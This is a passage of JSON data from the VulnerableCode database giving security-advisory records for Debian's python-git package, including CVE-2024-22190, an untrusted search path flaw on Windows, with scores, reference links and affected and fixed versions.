lse,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@0%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936506?format=json","purl":"pkg:deb/debian/python-git@3.1.14-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.14-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936504?format=json","purl":"pkg:deb/debian/python-git@3.1.30-1%2Bdeb12u2?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.30-1%252Bdeb12u2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936509?format=json","purl":"pkg:deb/debian/python-git@3.1.44-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.44-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936508?format=json","purl":"pkg:deb/debian/python-git@3.1.46-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.46-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1103050?format=json","purl":"pkg:deb/debian/python-git@3.1.50-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.50-1%3Fdistro=trixie"}],"aliases":["CVE-2023-40590","GHSA-wfm5-v35h-vwf4","PYSEC-2023-161"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qf8a-r6sz-qqf7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11839?format=json","vulnerability_id":"VCID-y786-mwkd-u7ha","summary":"GitPython is a python library used to interact with Git repositories. There is an incomplete fix for CVE-2023-40590. On Windows, GitPython uses an untrusted search path if it uses a shell to run `git`, as well as when it runs `bash.exe` to interpret hooks. If either of those features are used on Windows, a malicious `git.exe` or `bash.exe` may be run from an untrusted repository. This issue has been patched in version 3.1.41.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-22190","reference_id":"","reference_type":"","scores":[{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57751","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57713","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57694","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57735","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57758","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57762","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57703","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57725","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.577","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57755","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57757","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57772","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57732","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57797","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57729","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57753","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57646","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57691","published_at":"2026-05-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-22190"},{"reference_url":"https://github.com/gitpython-developers/GitPython","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython"},{"reference_url":"https://github.com/gitpython-developers/GitPython/commit/ef3192cc414f2fd9978908454f6fd95243784c7f","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T18:06:43Z/"}],"url":"https://github.com/gitpython-developers/GitPython/commit/ef3192cc414f2fd9978908454f6fd95243784c7f"},{"reference_url":"https://github.com/gitpython-developers/GitPython/pull/1792","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T18:06:43Z/"}],"url":"https://github.com/gitpython-developers/GitPython/pull/1792"},{"reference_url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T18:06:43Z/"}],"url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2024-4.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2024-4.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-22190","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-22190"},{"reference_url":"https://github.com/advisories/GHSA-2mqj-m65w-jghx","reference_id":"GHSA-2mqj-m65w-jghx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2mqj-m65w-jghx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/936511?format=json","purl":"pkg:deb/debian/python-git@0?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@0%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936506?format=json","purl":"pkg:deb/debian/python-git@3.1.14-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.14-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936504?format=json","purl":"pkg:deb/debian/python-git@3.1.30-1%2Bdeb12u2?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.30-1%252Bdeb12u2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936509?format=json","purl":"pkg:deb/debian/python-git@3.1.44-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.44-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936508?format=json","purl":"pkg:deb/debian/python-git@3.1.46-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.46-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1103050?format=json","purl":"pkg:deb/debian/python-git@3.1.50-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.50-1%3Fdistro=trixie"}],"aliases":["CVE-2024-22190","GHSA-2mqj-m65w-jghx","PYSEC-2024-4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y786-mwkd-u7ha"}],"risk_score":"4.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.44-1%3Fdistro=trixie"}